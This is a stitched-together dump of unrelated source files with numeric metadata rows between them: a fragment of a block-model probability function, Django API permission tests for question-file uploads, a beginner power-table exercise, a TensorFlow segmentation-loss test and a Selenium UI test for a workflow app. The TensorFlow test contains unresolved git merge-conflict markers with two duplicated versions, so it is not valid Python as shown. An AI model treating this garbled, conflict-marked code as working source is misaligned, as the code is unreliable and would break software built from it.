binomial_values = (n_r * n_s + temp - 1, temp)
if binomial_values not in BINOMIALS:
BINOMIALS[binomial_values] = binom(*binomial_values)
probability /= BINOMIALS[binomial_values]
probability *= math.factorial(n_r)
number_of_blocks_below = hierarchy_partition.get_number_of_blocks_in_level(level - 1)
probability /= math.factorial(number_of_blocks_below)
binomial_values = (number_of_blocks_below - 1, number_of_blocks - 1)
if binomial_values not in BINOMIALS:
BINOMIALS[binomial_values] = binom(*binomial_values)
probability /= BINOMIALS[binomial_values]
probability /= number_of_blocks_below
# include last hierarchy step
number_of_blocks_below = number_of_blocks
binomial_values = (
number_of_blocks_below * number_of_blocks_below + hierarchy_partition.edge_total - 1,
hierarchy_partition.edge_total)
if binomial_values not in BINOMIALS:
BINOMIALS[binomial_values] = binom(*binomial_values)
probability /= BINOMIALS[binomial_values]
# next factor \prod_r n_r^L!/B_{L-1}! is always one (n_r^L = n_1^L = B_{L-1})
# next factor simplifies to 1 too, because binomial above 0 is always 1
# and last factor
probability /= number_of_blocks_below
return probability
| 47.4689
| 116
| 0.672009
| 1,193
| 9,921
| 5.20285
| 0.11316
| 0.191397
| 0.067666
| 0.093443
| 0.868536
| 0.852425
| 0.852425
| 0.846786
| 0.843886
| 0.843886
| 0
| 0.010664
| 0.243826
| 9,921
| 209
| 117
| 47.4689
| 0.816716
| 0.206028
| 0
| 0.792308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.038462
| 0
| 0.169231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f7ee6e9933cd0117ae68c10e8ce70eb8c3e275e
| 14,347
|
py
|
Python
|
control/tests/test_api_question_file.py
|
SocialGouv/ecollecte
|
1bfce2e0700b563c111c11452356b46ecb2630e4
|
[
"MIT"
] | 9
|
2018-11-28T07:36:37.000Z
|
2022-02-04T12:56:11.000Z
|
control/tests/test_api_question_file.py
|
betagouv/e-controle
|
b6f790ca2590ac257a47930a1e521b86ce3edb29
|
[
"MIT"
] | 154
|
2018-11-22T14:41:17.000Z
|
2022-02-12T08:48:57.000Z
|
control/tests/test_api_question_file.py
|
betagouv/e-controle
|
b6f790ca2590ac257a47930a1e521b86ce3edb29
|
[
"MIT"
] | 10
|
2018-11-13T06:57:10.000Z
|
2022-03-21T13:04:49.000Z
|
from pytest import mark
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from rest_framework.test import APIClient
from control.models import Control, QuestionFile, Questionnaire
from tests import factories, utils
from user_profiles.models import UserProfile
pytestmark = mark.django_db
client = APIClient()
User = get_user_model()
## List API
def list_annexes(user):
utils.login(client, user=user)
url = reverse('api:annexe-list')
return client.get(url)
def list_annexes_for_question(user, questionId):
utils.login(client, user=user)
url = f"{reverse('api:annexe-list')}?question={questionId}"
return client.get(url)
def test_inspector_can_list_question_file_from_draft_questionnaire():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
published_question_file = factories.QuestionFileFactory()
published_questionnaire = published_question_file.question.theme.questionnaire
published_questionnaire.is_draft = False
published_questionnaire.save()
assert Questionnaire.objects.get(id=published_questionnaire.id).is_published
inspector.controls.add(published_questionnaire.control)
draft_question_file = factories.QuestionFileFactory()
draft_questionnaire = draft_question_file.question.theme.questionnaire
draft_questionnaire.is_draft = True
draft_questionnaire.save()
assert Questionnaire.objects.get(id=draft_questionnaire.id).is_draft
inspector.controls.add(draft_questionnaire.control)
response = list_annexes(inspector.user)
assert response.status_code == 200
assert published_question_file.file.name in str(response.content)
assert draft_question_file.file.name in str(response.content)
assert len(response.data) == 2
def test_audited_cannot_list_question_file_from_draft_questionnaire():
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
published_question_file = factories.QuestionFileFactory()
published_questionnaire = published_question_file.question.theme.questionnaire
published_questionnaire.is_draft = False
published_questionnaire.save()
assert Questionnaire.objects.get(id=published_questionnaire.id).is_published
audited.controls.add(published_questionnaire.control)
draft_question_file = factories.QuestionFileFactory()
draft_questionnaire = draft_question_file.question.theme.questionnaire
draft_questionnaire.is_draft = True
draft_questionnaire.save()
assert Questionnaire.objects.get(id=draft_questionnaire.id).is_draft
audited.controls.add(draft_questionnaire.control)
response = list_annexes(audited.user)
assert response.status_code == 200
assert published_question_file.file.name in str(response.content)
assert draft_question_file.file.name not in str(response.content)
assert len(response.data) == 1
def test_audited_cannot_list_question_file_by_question_from_draft_questionnaire():
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
draft_question_file = factories.QuestionFileFactory()
draft_questionnaire = draft_question_file.question.theme.questionnaire
draft_questionnaire.is_draft = True
draft_questionnaire.save()
assert Questionnaire.objects.get(id=draft_questionnaire.id).is_draft
audited.controls.add(draft_questionnaire.control)
response = list_annexes_for_question(audited.user, draft_question_file.question.id)
assert response.status_code == 200
assert len(response.data) == 0
assert draft_question_file.file.name not in str(response.content)
def test_cannot_list_question_file_by_question_from_deleted_control():
deleted_question_file = factories.QuestionFileFactory()
deleted_control = deleted_question_file.question.theme.questionnaire.control
deleted_control.delete()
assert Control.objects.get(id=deleted_control.id).is_deleted
# Audited
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
audited.controls.add(deleted_control)
response = list_annexes_for_question(audited.user, deleted_question_file.question.id)
assert response.status_code == 200
assert len(response.data) == 0
assert deleted_question_file.file.name not in str(response.content)
# Inspector
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
inspector.controls.add(deleted_control)
response = list_annexes_for_question(inspector.user, deleted_question_file.question.id)
assert response.status_code == 200
assert len(response.data) == 0
assert deleted_question_file.file.name not in str(response.content)
### Retrive API endpoint closed.
def get_question_file(user, id):
return utils.get_resource(client, user, 'annexe', id)
def update_question_file(user, payload):
return utils.update_resource(client, user, 'annexe', payload)
def test_cannot_get_question_file_even_if_user_belongs_to_control():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
question_file = factories.QuestionFileFactory()
questionnaire = question_file.question.theme.questionnaire
inspector.controls.add(questionnaire.control)
audited.controls.add(questionnaire.control)
questionnaire.is_draft = False
questionnaire.save()
assert Questionnaire.objects.get(id=questionnaire.id).is_published
# method not allowed
assert get_question_file(inspector.user, question_file.id).status_code == 405
assert get_question_file(audited.user, question_file.id).status_code == 405
def test_cannot_get_inexistant_question_file():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
# method not allowed
assert get_question_file(inspector.user, 21038476187629481736498376).status_code == 405
def test_cannot_get_question_file_if_control_is_deleted():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question_file = factories.QuestionFileFactory()
inspector.controls.add(question_file.question.theme.questionnaire.control)
question_file.question.theme.questionnaire.control.delete()
# method not allowed
assert get_question_file(inspector.user, question_file.id).status_code == 405
def test_audited_cannot_get_question_file_from_draft_questionnaire():
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
question_file = factories.QuestionFileFactory()
audited.controls.add(question_file.question.theme.questionnaire.control)
question_file.question.theme.questionnaire.is_draft = True
question_file.question.theme.questionnaire.save()
assert Questionnaire.objects.get(id=question_file.question.theme.questionnaire.id).is_draft
# method not allowed
assert get_question_file(audited.user, question_file.id).status_code == 405
def test_inspector_cannot_update_question_file_from_published_questionnaire():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question_file = factories.QuestionFileFactory()
questionnaire = question_file.question.theme.questionnaire
inspector.controls.add(questionnaire.control)
questionnaire.is_draft = False
questionnaire.save()
assert Questionnaire.objects.get(id=questionnaire.id).is_published
payload = {
"id": question_file.id,
"question": question_file.question.id + 1
}
# method not allowed
assert update_question_file(inspector.user, payload).status_code == 405
def test_audited_cannot_update_question_file_from_published_questionnaire():
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
question_file = factories.QuestionFileFactory()
questionnaire = question_file.question.theme.questionnaire
audited.controls.add(questionnaire.control)
questionnaire.is_draft = False
questionnaire.save()
assert Questionnaire.objects.get(id=questionnaire.id).is_published
payload = {
"id": question_file.id,
"question": question_file.question.id + 1
}
# forbidden
assert update_question_file(audited.user, payload).status_code == 403
def test_audited_cannot_update_question_file_from_draft_questionnaire():
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
question_file = factories.QuestionFileFactory()
questionnaire = question_file.question.theme.questionnaire
audited.controls.add(questionnaire.control)
questionnaire.is_draft = True
questionnaire.save()
assert Questionnaire.objects.get(id=questionnaire.id).is_draft
payload = {
"id": question_file.id,
"question": question_file.question.id + 1
}
# Forbidden
assert update_question_file(audited.user, payload).status_code == 403
### Upload API
def test_inspector_can_upload_question_file():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question = factories.QuestionFactory()
questionnaire = question.theme.questionnaire
questionnaire.is_draft = True
questionnaire.save()
inspector.controls.add(questionnaire.control)
utils.login(client, user=inspector.user)
url = reverse('api:annexe-list')
count_before = QuestionFile.objects.count()
post_data = {
'file': factories.dummy_file.open(),
'question': [question.id]
}
response = client.post(url, post_data, format='multipart')
assert response.status_code == 201
count_after = QuestionFile.objects.count()
assert count_after == count_before + 1
def test_inspector_cannot_upload_question_file_to_published_questionnaire():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question = factories.QuestionFactory()
questionnaire = question.theme.questionnaire
questionnaire.is_draft = False
questionnaire.save()
inspector.controls.add(questionnaire.control)
utils.login(client, user=inspector.user)
url = reverse('api:annexe-list')
count_before = QuestionFile.objects.count()
post_data = {
'file': factories.dummy_file.open(),
'question': [question.id]
}
response = client.post(url, post_data, format='multipart')
assert response.status_code == 403
count_after = QuestionFile.objects.count()
assert count_after == count_before
def test_inspector_can_remove_question_file():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question_file = factories.QuestionFileFactory()
questionnaire = question_file.question.theme.questionnaire
questionnaire.is_draft = True
questionnaire.save()
inspector.controls.add(questionnaire.control)
utils.login(client, user=inspector.user)
url = reverse('api:annexe-detail', args=[question_file.id])
count_before = QuestionFile.objects.count()
response = client.delete(url)
assert response.status_code == 204
count_after = QuestionFile.objects.count()
assert count_after == count_before - 1
def test_inspector_cannot_remove_question_file_if_control_is_published():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question_file = factories.QuestionFileFactory()
questionnaire = question_file.question.theme.questionnaire
questionnaire.is_draft = False
questionnaire.save()
inspector.controls.add(questionnaire.control)
utils.login(client, user=inspector.user)
url = reverse('api:annexe-detail', args=[question_file.id])
count_before = QuestionFile.objects.count()
response = client.delete(url)
assert response.status_code == 403
count_after = QuestionFile.objects.count()
assert count_after == count_before
def test_inspector_cannot_remove_question_file_if_control_is_deleted():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question_file = factories.QuestionFileFactory()
inspector.controls.add(question_file.question.theme.questionnaire.control)
utils.login(client, user=inspector.user)
url = reverse('api:annexe-detail', args=[question_file.id])
count_before = QuestionFile.objects.count()
question_file.question.theme.questionnaire.control.delete()
response = client.delete(url)
assert response.status_code == 404
count_after = QuestionFile.objects.count()
assert count_after == count_before
def test_cannot_upload_question_file_if_control_is_deleted():
inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
question = factories.QuestionFactory()
inspector.controls.add(question.theme.questionnaire.control)
utils.login(client, user=inspector.user)
url = reverse('api:annexe-list')
post_data = {
'file': factories.dummy_file.open(),
'question': [question.id]
}
question.theme.questionnaire.control.delete()
response = client.post(url, post_data, format='multipart')
assert response.status_code == 403
def test_audited_cannot_upload_question_file():
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
question = factories.QuestionFactory()
audited.controls.add(question.theme.questionnaire.control)
utils.login(client, user=audited.user)
url = reverse('api:annexe-list')
count_before = QuestionFile.objects.count()
post_data = {
'file': factories.dummy_file.open(),
'question': [question.id]
}
response = client.post(url, post_data, format='multipart')
assert response.status_code == 403
count_after = QuestionFile.objects.count()
assert count_after == count_before
def test_audited_cannot_remove_question_file():
audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
question_file = factories.QuestionFileFactory()
audited.controls.add(question_file.question.theme.questionnaire.control)
utils.login(client, user=audited.user)
url = reverse('api:annexe-detail', args=[question_file.id])
count_before = QuestionFile.objects.count()
response = client.delete(url)
assert response.status_code == 403
count_after = QuestionFile.objects.count()
assert count_after == count_before
| 37.755263
| 95
| 0.775354
| 1,650
| 14,347
| 6.494545
| 0.067273
| 0.100784
| 0.050392
| 0.074468
| 0.897536
| 0.882699
| 0.866275
| 0.811124
| 0.781728
| 0.756346
| 0
| 0.007978
| 0.135081
| 14,347
| 379
| 96
| 37.854881
| 0.855589
| 0.012616
| 0
| 0.727941
| 0
| 0
| 0.022547
| 0.003534
| 0
| 0
| 0
| 0
| 0.1875
| 1
| 0.084559
| false
| 0
| 0.025735
| 0.007353
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f8232bbb830d04a89909ffff83c22e464a7d30d
| 658
|
py
|
Python
|
own_practice/two_twelve.py
|
Ellis0817/Introduction-to-Programming-Using-Python
|
1882a2a846162d5ff56d4d56c3940b638ef408bd
|
[
"MIT"
] | null | null | null |
own_practice/two_twelve.py
|
Ellis0817/Introduction-to-Programming-Using-Python
|
1882a2a846162d5ff56d4d56c3940b638ef408bd
|
[
"MIT"
] | 4
|
2019-11-07T12:32:19.000Z
|
2020-07-19T14:04:44.000Z
|
own_practice/two_twelve.py
|
Ellis0817/Introduction-to-Programming-Using-Python
|
1882a2a846162d5ff56d4d56c3940b638ef408bd
|
[
"MIT"
] | 5
|
2019-12-04T15:56:55.000Z
|
2022-01-14T06:19:18.000Z
|
"""
程式設計練習題 2.2-2.10 2.12 列印表格.
請撰寫一程式,顯示以下這個表格:
```
a b a ** b
1 2 1
2 3 8
3 4 81
4 5 1024
5 6 15625
```
"""
A_PRINT = 1
B_PRINT = 2
AB = A_PRINT ** B_PRINT
print("a", "b", "a ** b")
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
| 14.304348
| 27
| 0.588146
| 136
| 658
| 2.580882
| 0.147059
| 0.324786
| 0.239316
| 0.410256
| 0.817664
| 0.780627
| 0.780627
| 0.723647
| 0.723647
| 0.723647
| 0
| 0.088843
| 0.264438
| 658
| 45
| 28
| 14.622222
| 0.636364
| 0.227964
| 0
| 0.88
| 0
| 0
| 0.016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.28
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f69ce4649d313633435c0a82a4defb358ff6ed08
| 54
|
py
|
Python
|
projects/mypackage/__init__.py
|
monaen/DHLO2021-2021Spring
|
4953e0305b5b9b01341345c25933c1f2d0224104
|
[
"Apache-2.0"
] | 2
|
2021-03-03T06:19:36.000Z
|
2021-09-27T09:47:00.000Z
|
projects/mypackage/__init__.py
|
monaen/DHLO2021-2021Spring
|
4953e0305b5b9b01341345c25933c1f2d0224104
|
[
"Apache-2.0"
] | null | null | null |
projects/mypackage/__init__.py
|
monaen/DHLO2021-2021Spring
|
4953e0305b5b9b01341345c25933c1f2d0224104
|
[
"Apache-2.0"
] | null | null | null |
from . import generate_num
from . import print_results
| 27
| 27
| 0.833333
| 8
| 54
| 5.375
| 0.75
| 0.465116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 54
| 2
| 27
| 27
| 0.914894
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
12431a4f4d78b3a4fe80a92cbf0b4e13495035b1
| 3,710
|
py
|
Python
|
official/vision/beta/projects/volumetric_models/losses/segmentation_losses_test.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
official/vision/beta/projects/volumetric_models/losses/segmentation_losses_test.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
official/vision/beta/projects/volumetric_models/losses/segmentation_losses_test.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
<<<<<<< HEAD
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for segmentation_losses.py."""
from absl.testing import parameterized
import tensorflow as tf
from official.vision.beta.projects.volumetric_models.losses import segmentation_losses
class SegmentationLossDiceScoreTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters((None, 0.5, 0.3), ('generalized', 0.5, 0.3),
('adaptive', 0.5, 0.07))
def test_supported_loss(self, metric_type, output, expected_score):
loss = segmentation_losses.SegmentationLossDiceScore(
metric_type=metric_type)
logits = tf.constant(output, shape=[1, 128, 128, 128, 1], dtype=tf.float32)
labels = tf.ones(shape=[1, 128, 128, 128, 1], dtype=tf.float32)
actual_score = loss(logits=logits, labels=labels)
self.assertAlmostEqual(actual_score.numpy(), expected_score, places=1)
if __name__ == '__main__':
tf.test.main()
=======
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for segmentation_losses.py."""
from absl.testing import parameterized
import tensorflow as tf
from official.vision.beta.projects.volumetric_models.losses import segmentation_losses
class SegmentationLossDiceScoreTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters((None, 0.5, 0.3), ('generalized', 0.5, 0.3),
('adaptive', 0.5, 0.07))
def test_supported_loss(self, metric_type, output, expected_score):
loss = segmentation_losses.SegmentationLossDiceScore(
metric_type=metric_type)
logits = tf.constant(output, shape=[2, 128, 128, 128, 1], dtype=tf.float32)
labels = tf.ones(shape=[2, 128, 128, 128, 1], dtype=tf.float32)
actual_score = loss(logits=logits, labels=labels)
self.assertAlmostEqual(actual_score.numpy(), expected_score, places=1)
@parameterized.parameters((None, 0, 0), ('generalized', 0, 0),
('adaptive', 0, 0))
def test_supported_loss_zero_labels_logits(self, metric_type, output,
expected_score):
loss = segmentation_losses.SegmentationLossDiceScore(
metric_type=metric_type)
logits = tf.constant(output, shape=[2, 128, 128, 128, 1], dtype=tf.float32)
labels = tf.zeros(shape=[2, 128, 128, 128, 1], dtype=tf.float32)
actual_score = loss(logits=logits, labels=labels)
self.assertAlmostEqual(actual_score.numpy(), expected_score, places=1)
if __name__ == '__main__':
tf.test.main()
>>>>>>> 0650ea24129892fb026a27b37028b500fb9383fa
| 41.685393
| 87
| 0.712129
| 491
| 3,710
| 5.268839
| 0.250509
| 0.046386
| 0.006958
| 0.023193
| 0.947043
| 0.947043
| 0.947043
| 0.947043
| 0.947043
| 0.94627
| 0
| 0.051905
| 0.179515
| 3,710
| 88
| 88
| 42.159091
| 0.797963
| 0.313477
| 0
| 0.744186
| 0
| 0
| 0.030353
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0
| null | null | 0
| 0.139535
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89e54ee69b4064550fbd7562391336ba2a0d2bfd
| 46,560
|
py
|
Python
|
src/dataops/tests/test_views.py
|
Lukahm/ontask
|
f16bdaa06ea450ee56d4581340e611b1076bed16
|
[
"MIT"
] | 3
|
2018-08-24T10:48:40.000Z
|
2020-05-29T06:33:23.000Z
|
src/dataops/tests/test_views.py
|
Lukahm/ontask
|
f16bdaa06ea450ee56d4581340e611b1076bed16
|
[
"MIT"
] | null | null | null |
src/dataops/tests/test_views.py
|
Lukahm/ontask
|
f16bdaa06ea450ee56d4581340e611b1076bed16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import os
from django.conf import settings
from django.shortcuts import reverse
from django.utils.html import escape
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.ui import WebDriverWait
import test
from dataops import pandas_db
from workflow.models import Workflow
class DataopsSymbols(test.OntaskLiveTestCase):
fixtures = ['wflow_symbols']
filename = os.path.join(
settings.BASE_DIR(),
'dataops',
'fixtures',
'wflow_symbols_df.sql'
)
def setUp(self):
super(DataopsSymbols, self).setUp()
pandas_db.pg_restore_table(self.filename)
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsSymbols, self).tearDown()
def test_01_symbols(self):
symbols = '!#$%&()*+,-./:;<=>?@[\]^_`{|}~'
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('sss')
wf_link.click()
# Wait for the table to be refreshed
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Edit the name column
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/button"
).click()
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/ul/li[1]/button"
).click()
WebDriverWait(self.selenium, 10).until(
EC.visibility_of_element_located((By.ID, 'id_name'))
)
# Replace name by symbols
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
# Click in the submit/save button
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for the table to be refreshed
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Click in the New Column button
self.selenium.find_element_by_class_name(
'js-workflow-column-add'
).click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Add column')
)
# Set name to symbols (new column) and type to string
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
self.selenium.find_element_by_id("id_data_type").click()
Select(self.selenium.find_element_by_id(
"id_data_type"
)).select_by_visible_text("string")
# Save the new column
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'error_1_id_name')))
# There should be a message saying that the name of this column already
# exists
self.assertIn('There is a column already with this name',
self.selenium.page_source)
# Click again in the name and introduce something different
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols + '2')
# Save the new column
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
self.wait_close_modal_refresh_table('column-table_previous')
# Click in the attributes section
self.selenium.find_element_by_xpath(
"//div[@id='workflow-area']/div/button[3]"
).click()
self.selenium.find_element_by_link_text('Attributes').click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable((By.CLASS_NAME, 'js-attribute-create'))
)
# Delete the existing one and confirm deletion
self.selenium.find_element_by_xpath(
"//table[@id='attribute-table']/tbody/tr/td[3]/button[2]"
).click()
# Wait for the delete confirmation frame
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'modal-title'),
'Confirm attribute deletion')
)
# Click in the delete confirm button
self.selenium.find_element_by_xpath(
"//div[@class='modal-footer']/button[2]"
).click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for the table to be refreshed
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'attribute-table_previous'))
)
# Add a new attribute and insert key (symbols) and value
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create attribute')
)
# Add key and value
self.selenium.find_element_by_id("id_key").click()
self.selenium.find_element_by_id("id_key").clear()
self.selenium.find_element_by_id("id_key").send_keys(symbols + '3')
self.selenium.find_element_by_id("id_value").click()
self.selenium.find_element_by_id("id_value").clear()
self.selenium.find_element_by_id("id_value").send_keys("vvv")
# Submit new attribute
self.selenium.find_element_by_xpath(
"//div[@class='modal-footer']/button[2]"
).click()
# MODAL WAITING
self.wait_close_modal_refresh_table('attribute-table_previous')
# Save and close the attribute page
self.selenium.find_element_by_link_text('Back').click()
# Wait for the details page
self.wait_close_modal_refresh_table('column-table_previous')
# Click in the TABLE link
self.selenium.find_element_by_link_text("Table").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'table-data_previous'))
)
# Verify that everything appears normally
self.assertIn(escape(symbols), self.selenium.page_source)
self.assertIn(escape(symbols + '2'), self.selenium.page_source)
# Click in the Actions navigation menu
self.selenium.find_element_by_link_text("Actions").click()
# Edit the action-in
self.selenium.find_element_by_link_text("Edit").click()
# Set the right columns to process
select = Select(self.selenium.find_element_by_id(
'select-column-name'))
select.select_by_visible_text('!#$%&()*+,-./:;<=>?@[\]^_`{|}~2')
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located(
(By.ID, 'column-selected-table_previous'))
)
select = Select(self.selenium.find_element_by_id(
'select-key-column-name'))
select.select_by_visible_text('sid')
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located(
(By.ID, 'column-selected-table_previous'))
)
select = Select(self.selenium.find_element_by_id(
'select-key-column-name'))
select.select_by_visible_text('email')
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located(
(By.ID, 'column-selected-table_previous'))
)
# Save action-in
self.selenium.find_element_by_link_text('Done').click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Click in the RUN link of the action in
self.selenium.find_element_by_link_text("Run").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Enter data using the RUN menu. Select one entry to populate
self.selenium.find_element_by_link_text("student1@bogus.com").click()
self.selenium.find_element_by_id("id____ontask___select_2").click()
self.selenium.find_element_by_id("id____ontask___select_2").clear()
self.selenium.find_element_by_id("id____ontask___select_2").send_keys(
"Carmelo Coton2")
self.selenium.find_element_by_id("id____ontask___select_3").click()
self.selenium.find_element_by_id("id____ontask___select_3").clear()
self.selenium.find_element_by_id("id____ontask___select_3").send_keys(
"xxx"
)
# Submit the data for one entry
self.selenium.find_element_by_xpath(
"//body/div[4]/div/form/button[1]/span").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
